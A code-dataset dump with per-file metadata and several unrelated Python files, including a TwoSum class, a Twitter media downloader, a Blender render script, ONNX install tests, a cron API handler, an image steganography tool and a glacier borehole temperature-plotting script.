] | null | null | null | day:40/twosumdesign.py | hawaijar/FireLeetcode | e981e96f6a38a3b08e9b7ef59aec65f6e0e5728a | [
"MIT"
] | 1 | 2020-10-21T12:28:24.000Z | 2020-10-21T12:28:24.000Z |
# Your TwoSum object will be instantiated and called as such:
# obj = TwoSum()
# obj.add(number)
# param_2 = obj.find(value)
| 24.631579 | 81 | 0.483974 | class TwoSum:
def __init__(self):
"""
Initialize your data structure here.
"""
self.hash = {}
def add(self, number: int) -> None:
"""
Add the number to an internal data structure..
"""
if(number in self.hash):
self.hash[number] += 1;
else:
self.hash[number] = 1;
def find(self, value: int) -> bool:
"""
Find if there exists any pair of numbers which sum is equal to the value.
"""
for key in self.hash.keys():
diff = value - key;
if(key == diff):
if(self.hash[key] > 1):
return True;
else:
if( diff in self.hash):
return True;
return False;
# Your TwoSum object will be instantiated and called as such:
# obj = TwoSum()
# obj.add(number)
# param_2 = obj.find(value)
| 0 | 778 | 22 |
91147a5dd1a99b381d1c2bafb0c93feb8b412116 | 1,988 | py | Python | file_handler.py | deadcatssociety/sachaller | c997a4bffe6393d8132d3f45f43056417e1aca08 | [
"MIT"
] | null | null | null | file_handler.py | deadcatssociety/sachaller | c997a4bffe6393d8132d3f45f43056417e1aca08 | [
"MIT"
] | null | null | null | file_handler.py | deadcatssociety/sachaller | c997a4bffe6393d8132d3f45f43056417e1aca08 | [
"MIT"
] | null | null | null | import requests
import os
from pathlib import Path
import settings
| 31.0625 | 64 | 0.545272 | import requests
import os
from pathlib import Path
import settings
class FileHandler:
@classmethod
async def get_media(cls, status):
if hasattr(status, "retweeted_status"):
return
if 'media' not in status.entities:
return
url = None
id = status.user.id
user_name = status.user.name
print('START FIND MEDIA')
for media in status.extended_entities['media']:
if "video_info" not in media:
print('PHOTO FILE')
url = media["media_url_https"]
cls.get_file(id, user_name, url)
continue
bitrate = 0
video_info = media["video_info"]
for vid in video_info["variants"]:
print('VIDEO FILE')
if "bitrate" not in vid:
continue
if bitrate <= vid["bitrate"]:
bitrate = vid["bitrate"]
url = vid["url"]
cls.get_file(id, user_name, url)
print('END FIND MEDIA')
@classmethod
def get_file(cls, user_id, user_name, url):
path = f'{settings.BASE_PATH}{user_id}/'
Path(path).mkdir(parents=True, exist_ok=True)
print(f'Start Folder Write: {path}')
try:
print(f'START USERNAME TEXT, USERNAME: {user_name}')
if not os.path.exists(path + user_name):
with open(path + user_name, 'w'): pass
print(f'END USERNAME TEXT, USERNAME: {user_name}')
except:
print(f'ERROR USERNAME TEXT, USERNAME: {user_name}')
pass
media_url = requests.get(url)
file_name = url.split('/')[-1].split('?')[0]
file_path = path + file_name
print(f'START WRITE MEDIA FILE, PATH: {file_path}')
if not os.path.exists(file_path):
open(file_path, 'wb').write(media_url.content)
print(f'END WRITE MEDIA FILE, PATH: {file_path}')
| 1,812 | 84 | 23 |
b4c2d2c978dd4b72ebd7e4239b8f945f29a52b5e | 2,356 | py | Python | pcs/blender_addon/modules/blvcw/crystal_well_headless.py | bisdan/pcs | c77ed4165a2794f28ac72413f2ef0afeadb58297 | [
"MIT"
] | null | null | null | pcs/blender_addon/modules/blvcw/crystal_well_headless.py | bisdan/pcs | c77ed4165a2794f28ac72413f2ef0afeadb58297 | [
"MIT"
] | null | null | null | pcs/blender_addon/modules/blvcw/crystal_well_headless.py | bisdan/pcs | c77ed4165a2794f28ac72413f2ef0afeadb58297 | [
"MIT"
] | null | null | null | """
Crystal Well Headless execution.
Should not be called directly but via headless_execution.py.
"""
import os
import sys
from blvcw.crystal_well_components import CrystalWellSettings, CrystalWellLoader
from blvcw.crystal_well_simulation import CrystalWellSimulator
class __CrystalWellHeadlessExecution:
"""
Performs headless execution with a provided settings file.
The following steps are performed:
1. CrystalWellSettings is loaded with the settings file
2. CrystalWellLoader is generated and imports the crystal object if a custom file is provided
3. CrystalWellSimulator is called with the classes created before and renders like in the add-on
"""
argv = sys.argv
if "--settings_file" not in argv:
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
settings_file = argv[argv.index("--settings_file") + 1]
if settings_file == "":
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
elif not os.path.exists(settings_file): # Path not found
print("ERROR: SETTINGS FILE NOT FOUND")
exit(1)
crystal_well_headless = __CrystalWellHeadlessExecution(settings_file_path=settings_file)
crystal_well_headless.perform_headless_execution()
exit(0)
| 36.8125 | 101 | 0.735144 | """
Crystal Well Headless execution.
Should not be called directly but via headless_execution.py.
"""
import os
import sys
from blvcw.crystal_well_components import CrystalWellSettings, CrystalWellLoader
from blvcw.crystal_well_simulation import CrystalWellSimulator
class __CrystalWellHeadlessExecution:
"""
Performs headless execution with a provided settings file.
The following steps are performed:
1. CrystalWellSettings is loaded with the settings file
2. CrystalWellLoader is generated and imports the crystal object if a custom file is provided
3. CrystalWellSimulator is called with the classes created before and renders like in the add-on
"""
def __init__(self, settings_file_path):
self.settings_file_path = settings_file_path
def perform_headless_execution(self):
crystal_well_settings = CrystalWellSettings()
crystal_well_settings.from_json(self.settings_file_path)
settings_dict = crystal_well_settings.settings_dict
crystal_well_loader = CrystalWellLoader(crystal_object=settings_dict["crystal_object"])
if settings_dict["crystal_object"] == "CUSTOM":
crystal_well_loader.import_obj(settings_dict["crystal_import_path"], clear_material=True)
crystal_well_loader.set_number_crystal_variants_per_render(
number_crystal_variants=settings_dict["number_variants"])
crystal_well_simulator = CrystalWellSimulator(crystal_well_settings=crystal_well_settings,
crystal_well_loader=crystal_well_loader)
counter = 0
for _ in crystal_well_simulator.generate_image():
counter += 1
print("Rendered image number:", counter)
print("Headless execution finished. Created " + str(counter) + " images.")
argv = sys.argv
if "--settings_file" not in argv:
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
settings_file = argv[argv.index("--settings_file") + 1]
if settings_file == "":
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
elif not os.path.exists(settings_file): # Path not found
print("ERROR: SETTINGS FILE NOT FOUND")
exit(1)
crystal_well_headless = __CrystalWellHeadlessExecution(settings_file_path=settings_file)
crystal_well_headless.perform_headless_execution()
exit(0)
| 1,103 | 0 | 54 |
1822dd6009208ea74242aeb5fc8ef76d2cb13eec | 2,422 | py | Python | tests/sparseml/onnx/test_base.py | clementpoiret/sparseml | 8442a6ef8ba11fb02f5e51472dd68b72438539b9 | [
"Apache-2.0"
] | 922 | 2021-02-04T17:51:54.000Z | 2022-03-31T20:49:26.000Z | tests/sparseml/onnx/test_base.py | clementpoiret/sparseml | 8442a6ef8ba11fb02f5e51472dd68b72438539b9 | [
"Apache-2.0"
] | 197 | 2021-02-04T22:17:21.000Z | 2022-03-31T13:58:55.000Z | tests/sparseml/onnx/test_base.py | clementpoiret/sparseml | 8442a6ef8ba11fb02f5e51472dd68b72438539b9 | [
"Apache-2.0"
] | 80 | 2021-02-04T22:20:14.000Z | 2022-03-30T19:36:15.000Z | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from sparseml.onnx.base import (
check_onnx_install,
check_onnxruntime_install,
onnx,
onnx_err,
onnxruntime,
onnxruntime_err,
require_onnx,
require_onnxruntime,
)
| 26.326087 | 84 | 0.709744 | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from sparseml.onnx.base import (
check_onnx_install,
check_onnxruntime_install,
onnx,
onnx_err,
onnxruntime,
onnxruntime_err,
require_onnx,
require_onnxruntime,
)
def test_onnx():
assert onnx
assert not onnx_err
assert onnxruntime
assert not onnxruntime_err
def test_check_onnx_install():
assert check_onnx_install()
assert not check_onnx_install(min_version="10.0.0", raise_on_error=False)
with pytest.raises(ImportError):
check_onnx_install(min_version="10.0.0")
assert not check_onnx_install(max_version="0.0.1", raise_on_error=False)
with pytest.raises(ImportError):
check_onnx_install(max_version="0.0.1")
def test_check_onnxruntime_install():
assert check_onnxruntime_install()
assert not check_onnxruntime_install(min_version="10.0.0", raise_on_error=False)
with pytest.raises(ImportError):
check_onnxruntime_install(min_version="10.0.0")
assert not check_onnxruntime_install(max_version="0.0.1", raise_on_error=False)
with pytest.raises(ImportError):
check_onnxruntime_install(max_version="0.0.1")
def test_require_onnx():
@require_onnx()
def _func_one(arg1, arg2, arg3):
assert arg1
assert arg2
assert arg3
_func_one(arg1=1, arg2=2, arg3=3)
@require_onnx(min_version="10.0.0")
def _func_two():
pass
with pytest.raises(ImportError):
_func_two()
def test_require_onnxruntime():
@require_onnxruntime()
def _func_one(arg1, arg2, arg3):
assert arg1
assert arg2
assert arg3
_func_one(arg1=1, arg2=2, arg3=3)
@require_onnxruntime(min_version="10.0.0")
def _func_two():
pass
with pytest.raises(ImportError):
_func_two()
| 1,474 | 0 | 115 |
932005b599205728b3a6da781e017f6d07bda72f | 1,809 | py | Python | PaperInfo.py | Astatine-213-Tian/Past-Paper-Crawler | bbf686e9e4ddf61cc9918e61cbc108ee53631c81 | [
"MIT"
] | 2 | 2020-03-18T04:43:57.000Z | 2020-03-22T11:28:01.000Z | PaperInfo.py | Astatine-213-Tian/Past-Paper-Crawler | bbf686e9e4ddf61cc9918e61cbc108ee53631c81 | [
"MIT"
] | 1 | 2020-03-22T13:56:47.000Z | 2020-03-22T14:02:29.000Z | PaperInfo.py | Astatine-213-Tian/Past-Paper-Crawler | bbf686e9e4ddf61cc9918e61cbc108ee53631c81 | [
"MIT"
] | 2 | 2020-03-22T11:50:44.000Z | 2020-04-15T03:44:05.000Z | import re
| 32.303571 | 156 | 0.474848 | import re
class Paper:
def __init__(self, file_name, url):
self.url = url
self.season = "other"
self.season_sort = 9
self.year = "other"
self.type = "other"
self.num = "other"
self.region = "other"
pattern = re.compile(r'\d{4}_(\S)(\d{2})_(\S{2})_*(\w*).') # Pattern for matching the f_in (subject code, season, year, paper number, region number
match = re.match(pattern, file_name)
if match:
result = match.groups()
if result[0] == "m":
self.season = "March"
self.season_sort = 0
elif result[0] == "s":
self.season = "May/June"
self.season_sort = 1
elif result[0] == "w":
self.season = "November"
self.season_sort = 2
self.year = "20" + result[1]
self.type = result[2]
if result[3] and len(result[3]) <= 2:
if len(result[3]) == 1:
self.num = "Paper " + result[3][0]
elif result[3][0] == "0":
self.num = "Paper " + result[3][1]
else:
self.num = "Paper " + result[3][0]
self.region = "Region " + result[3][1]
class Pair: # Class for storing information of ms and qp in pairs
def __init__(self, qp, ms):
self.url = [qp.url, ms.url]
self.year = qp.year
self.season = qp.season
self.num = qp.num
self.region = qp.region if qp.region != "other" else ""
def display(self):
if self.region:
return self.year + " " + self.season + " " + self.num + " " + self.region
else:
return self.year + " " + self.season + " " + self.num
| 1,636 | 36 | 125 |
508751d0f54b5cda30fec2563fbe16b5f633581e | 621 | py | Python | hume/device/procedures/request_library.py | megacorpincorporated/hume | 40093cc7e5e79dbac8386e2e5f7f7a41c7e516e8 | [
"MIT"
] | 2 | 2019-08-18T10:21:43.000Z | 2020-08-23T19:55:17.000Z | hume/device/procedures/request_library.py | megacorpincorporated/hume | 40093cc7e5e79dbac8386e2e5f7f7a41c7e516e8 | [
"MIT"
] | 4 | 2019-08-03T08:58:15.000Z | 2021-06-09T15:49:49.000Z | hume/device/procedures/request_library.py | megacorpincorporated/hume | 40093cc7e5e79dbac8386e2e5f7f7a41c7e516e8 | [
"MIT"
] | null | null | null | import logging
from device.models import Device
from device import connection
from device.connection.gci import GCI
from defs import DeviceRequest
LOGGER = logging.getLogger(__name__)
"""
This module provides functions for sending requests to a device.
"""
def capability(device: Device):
"""
Sends a capability request to the target device.
:param device: device to send the capability request to
"""
content = f"^{DeviceRequest.CAPABILITY}$".encode("utf-8")
connection.send(GCI.Message(content), device)
| 17.25 | 64 | 0.718196 | import logging
from device.models import Device
from device import connection
from device.connection.gci import GCI
from defs import DeviceRequest
LOGGER = logging.getLogger(__name__)
"""
This module provides functions for sending requests to a device.
"""
def capability(device: Device):
"""
Sends a capability request to the target device.
:param device: device to send the capability request to
"""
content = f"^{DeviceRequest.CAPABILITY}$".encode("utf-8")
connection.send(GCI.Message(content), device)
def action():
pass
def heartbeat():
pass
def action_state():
pass
| 12 | 0 | 69 |
b85de9906ccbe05b2899cfe7553dd8c6f67b3e8e | 2,502 | py | Python | plugins/cron/views.py | IronTooch/ajenti | 17b62f6d73a913f97c1219843a2891da2606aea5 | [
"MIT"
] | 1 | 2022-03-02T19:44:31.000Z | 2022-03-02T19:44:31.000Z | plugins/cron/views.py | IronTooch/ajenti | 17b62f6d73a913f97c1219843a2891da2606aea5 | [
"MIT"
] | 1 | 2022-03-05T23:44:40.000Z | 2022-03-05T23:44:40.000Z | plugins/cron/views.py | IronTooch/ajenti | 17b62f6d73a913f97c1219843a2891da2606aea5 | [
"MIT"
] | null | null | null | """
Module to handle an user crontab file.
"""
import os
import pwd
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.api.endpoint import endpoint, EndpointError
from .manager import CronManager
from reconfigure.items.crontab import CrontabNormalTaskData, CrontabSpecialTaskData, CrontabEnvSettingData
@component(HttpPlugin) | 34.75 | 106 | 0.609113 | """
Module to handle an user crontab file.
"""
import os
import pwd
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.api.endpoint import endpoint, EndpointError
from .manager import CronManager
from reconfigure.items.crontab import CrontabNormalTaskData, CrontabSpecialTaskData, CrontabEnvSettingData
@component(HttpPlugin)
class Handler(HttpPlugin):
def __init__(self, context):
self.context = context
@url(r'/api/get_crontab')
@endpoint(api=True)
def handle_api_get_crontab(self, http_context):
"""
Get the cron content through ConManager and store it in a dict.
Method GET.
:param http_context: HttpContext
:type http_context: HttpContext
:return: Cron jobs
:rtype: dict
"""
if http_context.method == 'GET':
user = pwd.getpwuid(os.getuid()).pw_name
crontab = CronManager.get(self.context).load_tab(user)
return crontab.tree.to_dict()
@url(r'/api/save_crontab')
@endpoint(api=True)
def handle_api_save_crontab(self, http_context):
"""
Store cron data from frontend in a cron file through CronManager.
Method POST.
:param http_context: HttpContext
:type http_context: HttpContext
:return: True if successfull
:rtype: bool
"""
if http_context.method == 'POST':
def setTask(obj, values):
for k,v in values.items():
setattr(obj, k, v)
return obj
# Create empty config
user = self.context.identity
crontab = CronManager.get(self.context).load_tab(None)
new_crontab = http_context.json_body()['crontab']
for _type, values_list in new_crontab.items():
for values in values_list:
if _type == 'normal_tasks':
crontab.tree.normal_tasks.append(setTask(CrontabNormalTaskData(), values))
elif _type == 'special_tasks':
crontab.tree.special_tasks.append(setTask(CrontabSpecialTaskData(), values))
elif _type == 'env_settings':
crontab.tree.env_settings.append(setTask(CrontabEnvSettingData(), values))
try:
CronManager.get(self.context).save_tab(user, crontab)
return True
except Exception as e:
raise EndpointError(e) | 151 | 1,977 | 22 |
7becea34e4b418fc2d1816e9fa35757371e71df8 | 2,793 | py | Python | pentest-scripts/python-web-penetration-testing-cookbook/Chapter_06_Code/StegoFull.py | paulveillard/cybersecurity-penetration-testing | a5afff13ec25afd0cf16ef966d35bddb91518af4 | [
"Apache-2.0"
] | 6 | 2021-12-07T21:02:12.000Z | 2022-03-03T12:08:14.000Z | pentest-scripts/python-web-penetration-testing-cookbook/Chapter_06_Code/StegoFull.py | paulveillard/cybersecurity-penetration-testing | a5afff13ec25afd0cf16ef966d35bddb91518af4 | [
"Apache-2.0"
] | null | null | null | pentest-scripts/python-web-penetration-testing-cookbook/Chapter_06_Code/StegoFull.py | paulveillard/cybersecurity-penetration-testing | a5afff13ec25afd0cf16ef966d35bddb91518af4 | [
"Apache-2.0"
] | 1 | 2022-01-15T23:57:36.000Z | 2022-01-15T23:57:36.000Z | #!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The filename of the image that will be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the hidden image will be extracted to.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden image from carrier and save to output filename.")
(options, args) = parser.parse_args()
if options.extract == True:
if options.carrier is None or options.output is None:
parser.error("a carrier filename -c and output file -o are required for extraction")
else:
ExtractMessage(options.carrier, options.output)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
HideMessage(options.carrier, options.message, options.output)
| 34.481481 | 116 | 0.56749 | #!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
def HideMessage(carrier, message, outfile):
cImage = Image.open(carrier)
hide = Image.open(message)
hide = hide.resize(cImage.size)
hide = hide.convert('1')
out = Image.new(cImage.mode, cImage.size)
width, height = cImage.size
newArray = []
for h in range(height):
for w in range(width):
ip = cImage.getpixel((w,h))
hp = hide.getpixel((w,h))
if hp == 0: # Force 0 And with 254
newred = ip[0] & 254
else: # Force 1 Or with 1
newred = ip[0] | 1
newArray.append((newred, ip[1], ip[2]))
out.putdata(newArray)
out.save(outfile)
print "Steg image saved to " + outfile
def ExtractMessage(carrier, outfile):
cImage = Image.open(carrier)
out = Image.new('L', cImage.size)
width, height = cImage.size
newArray = []
for h in range(height):
for w in range(width):
ip = cImage.getpixel((w,h))
if ip[0] & 1 == 0:
newArray.append(0)
else:
newArray.append(255)
out.putdata(newArray)
out.save(outfile)
print "Message extracted and saved to " + outfile
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The filename of the image that will be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the hidden image will be extracted to.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden image from carrier and save to output filename.")
(options, args) = parser.parse_args()
if options.extract == True:
if options.carrier is None or options.output is None:
parser.error("a carrier filename -c and output file -o are required for extraction")
else:
ExtractMessage(options.carrier, options.output)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
HideMessage(options.carrier, options.message, options.output)
| 1,208 | 0 | 54 |
0785aa7f6956416f134ea789ff4aa671f3f99fe2 | 22,017 | py | Python | 3_plotting.py | laworbit/Law_et_alDTS | 3f11a53a1bb9147815cc39d4e8fb95bebd53aa6b | [
"MIT"
] | null | null | null | 3_plotting.py | laworbit/Law_et_alDTS | 3f11a53a1bb9147815cc39d4e8fb95bebd53aa6b | [
"MIT"
] | null | null | null | 3_plotting.py | laworbit/Law_et_alDTS | 3f11a53a1bb9147815cc39d4e8fb95bebd53aa6b | [
"MIT"
] | null | null | null | #script to plot results from 1_full_process.py
#science advances figure guidelines. Preferably 2.5, 5.0, or 7.3 inches wide
#and no more than 11.0 inches high. Miminum line width of 0.5 pt. 9 pt and
#bold for e.g. A, B, C, etc.
#Robert Law, Scott Polar Research Institute, University of Cambridge, 2020. rl491@cam.ac.uk
import os
import sys
import glob
import scipy
import pylab
import seaborn
import datetime
import matplotlib
import numpy as np
import xarray as xr
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.patches as patch
import matplotlib.ticker as mticker
from matplotlib.ticker import MultipleLocator
Polynomial = np.polynomial.Polynomial
os.chdir(os.path.dirname(sys.argv[0]))
from T0_curve_fitting import fit_model, plot_model
#define functions
#inputs
file_path_end = 'processed_data/ch1_end_processed.nc'
file_path_full = 'processed_data/ch1_full_processed.nc'
plot_date = datetime.datetime(2019, 8, 14, 0, 0, 0) #date for plotting in datetime format
av_date = datetime.datetime(2019, 8, 10, 0, 0, 0) #date for averaging where in use. Takes average from av_date to plot_date
bh_depth = 1042.95 #(m) from Sam Doyle BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth from DTS with refractive index error
z_start = 204. #(m) z value where cable first enters ice (in non corrected distance)
fs = 8
close_up_depth = 970 #(m) depth for basal close up to begin from
CTZ_lower = 982 #(m) interpreted depth of bottom of the CTZ
max_T = 1 #(deg C) maximum temperature for image plot
min_T = -22 #(deg C) minimum temperature for image plot
pmp_allow = 0.0 #(K) how far to allow pmp away from calculated value to include in temperate zone #WHERE TO DEFINE THIS AS? 0.075 FOR FIGURE, BUT LOWER VALUE WORKS BETTER FOR ANLYSIS.
equib_cut = 35 #(ind) depth cut to remove top section where cooling is not clearly exponential
fail_depth = (1109.5 - z_start)*(bh_depth/bh_depth_dts) #(m) at which point did the cable fail?
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#constants (i.e. things that definitely won't change unless some seriously strange shit happens)
T0 = 273.15 #(K) 0 degrees C in Kelvin
Ttr = 273.16 #(K) triple point temperature of water
ptr = 611.73 #(Pa) triple point pressure of water
g = 9.81 #(m/s^2) gravitational acceleration
Bs = 1.86 #(K kg mol^-1) constant for pmp calculations from Cuffey and Paterson following Lliboutry (1976)
#parameters (i.e. things that could change)
ccc = 9.14e-8 #(K/Pa) Clausius-Clapeyron constant
ccc2 = 9.14e-8 #(K/Pa) for water and solute load analysis. This value keeps the pmp line away from from the obvserved at all points
slope = 0.96 #(degrees) slope under borehole
rho_ice = 910. #(kg/m^3) ice density
#load datasets
ds_end = xr.open_dataset(file_path_end)
ds_full = xr.open_dataset(file_path_full)
#ds_end.tmpw.isel(t = -1).plot(linewidth = 0.7)
#plt.show()
print(ds_end)
print(ds_full)
sys.exit()
#correct depth
ds_end.z.values = (ds_end.z.values - z_start)*(bh_depth/bh_depth_dts)
ds_full.z.values = (ds_full.z.values - z_start)*(bh_depth/bh_depth_dts)
#extract useful part
#ds_end = ds_end.isel(t = -1)
#load data from Sam Doyle
Doyle_df = pd.read_csv('Doyle_data/analog_blue.csv')
Doyle_dt_val = Doyle_df.loc[:,'datetime'].values #datetime values
Doyle_dt_list = list(Doyle_dt_val) #datetime list
Doyle_dts = [datetime.datetime.strptime(x, r'%d/%m/%Y %H:%M') for x in Doyle_dt_list]
Doyle_dt_np = np.array(Doyle_dts) #into np array
#get plotting index
ind_date_Doyle = np.argmax(Doyle_dt_np > plot_date)
av_ind_date_Doyle = np.argmax(Doyle_dt_np > av_date)
#get T values from Doyle_df
T1 = Doyle_df.loc[ind_date_Doyle,"T1"]
T2 = Doyle_df.loc[ind_date_Doyle,"T2"]
T3 = Doyle_df.loc[ind_date_Doyle,"T3"]
T4 = Doyle_df.loc[ind_date_Doyle,"T4"]
T5 = Doyle_df.loc[ind_date_Doyle,"T5"]
T_doyle = np.array([T1, T2, T3, T4, T5])
#means
av_T1 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
av_T2 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
av_T3 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
av_T4 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
av_T5 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
av_T_doyle = np.array([av_T1, av_T2, av_T3, av_T4, av_T5])
#stds
std_T1 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
std_T2 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
std_T3 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
std_T4 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
std_T5 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
std_T_doyle = np.array([std_T1, std_T2, std_T3, std_T4, std_T5])
#manualy input thermistor depths (T1:T5)
T_depths = np.array([0.28, 1, 3, 5.04, 10.05])
T_depths = bh_depth - T_depths
#set scatter coords
x_scat = T_doyle
y_scat = T_depths
#Clausius-Clapeyron calculation
p_ice = rho_ice*g*ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start))*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
T_pmp_cc_w_sol = Ttr - ccc2*(p_ice - ptr) #for water and solute load analysis
#obtain indicies
depth_ind = np.argmax(ds_end.z.values > bh_depth)
#start_ind = np.argmax(ds_end.z.values > z_start) - 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 1. Time series image plot with close ups for solute load and water content
#image plot
y = ds_full.z.values
T = ds_full.tmpw.sel(z = slice(0+z_start, bh_depth+z_start)).values
close_up_ind = np.argmax(y > close_up_depth)
temp_min = -0.85
temp_max = -0.75
#create image of temperate zone
pmp_cut = T_pmp_cc
pmp_cut_w_sol = T_pmp_cc_w_sol
pmp_im = np.zeros(np.shape(T)) #pmp image
pmp_im_w_sol = np.zeros(np.shape(T)) #pmp image for water and solute analysis
pmp_ind = np.zeros(pmp_im.shape[1])
for i in range(pmp_im.shape[1]):
pmp_im[:,i] = pmp_cut
pmp_im_w_sol[:,i] = pmp_cut_w_sol
pmp_im_w_sol = pmp_im_w_sol - T0 #w_sol means for water and solute analysis
pmp_im = pmp_im - pmp_allow - T0
#find where temperate zone is exceeded
pmp_dif = T - pmp_im
pmp_dif_w_sol = pmp_im_w_sol - T
pmp_ind = np.greater(pmp_dif, np.zeros(np.shape(T)))
matplotlib.rcParams.update({'font.size': fs})
x_lims = mdates.date2num(ds_full.t.values)
fig1 = plt.figure(figsize = (7.3,130/25.4), constrained_layout=True)
gs = fig1.add_gridspec(10,20)
ax1a = fig1.add_subplot(gs[:6,:-1]) #main image
ax1b = fig1.add_subplot(gs[:6,-1]) #T colorbar
ax1c = fig1.add_subplot(gs[6:8,:-1]) #close up temperate zone T
ax1d = fig1.add_subplot(gs[6:8,-1]) #T colorbar for close up
ax1e = fig1.add_subplot(gs[8:10,:-1]) #water content
ax1f = fig1.add_subplot(gs[8:10,-1]) #water content colourbar
#main image
ax1a.imshow(T, vmin=min_T, vmax=max_T, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
ax1a.hlines(close_up_depth, x_lims[0], x_lims[-1], colors = 'r', lw=0.75, linestyles='dashed')
#print(T)
#ax1a.contour(T, levels = [-25, -20, -15, -10, -5, 0])
#ax1a.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'white', lw=0.8, linestyles='dashed')
#ax1a.contour( pmp_ind, levels=[0], colors='white', linewidths=0.75, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1a_contours = ax1a.contour( T, levels=[-25, -20, -15, -10, -5, 0], colors='white', linewidths=0.75, aspect='auto',
extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#ax1a.clabel(ax1a_contours, fontsize = fs)
#ax1a.set_ylim([bh_depth, 0])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1a.xaxis_date()
ax1a.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1a.set_ylabel(' ', fontsize= fs)
days = mdates.DayLocator()
ax1a.xaxis.set_minor_locator(days)
ax1a.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot1 = np.zeros((1000, 2))
cbar_plot1[:,0] = np.linspace(max_T, min_T, 1000)
cbar_plot1[:,1] = np.linspace(max_T, min_T, 1000)
im2 = ax1b.imshow( cbar_plot1, aspect='auto', cmap='viridis',
extent = [0, 1, min_T, max_T])
ax1b.set_xticks([])
ax1b.set_yticks(np.arange(min_T, max_T, 1), minor=True)
ax1b.yaxis.set_label_position("right")
ax1b.yaxis.tick_right()
ax1b.tick_params(axis='y', which='minor')
#ax1b.set_ylabel('Temperature ($^\circ$ C)')
#temp close up
ax1c.imshow(T, vmin=temp_min, vmax=temp_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1c.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1c.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1c.set_ylim([bh_depth, close_up_depth])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1c.xaxis_date()
ax1c.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
days = mdates.DayLocator()
ax1c.xaxis.set_minor_locator(days)
ax1c.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot2 = np.zeros((1000, 2))
cbar_plot2[:,0] = np.linspace(temp_max, temp_min, 1000)
cbar_plot2[:,1] = np.linspace(temp_max, temp_min, 1000)
im3 = ax1d.imshow( cbar_plot2, aspect='auto', cmap='viridis',
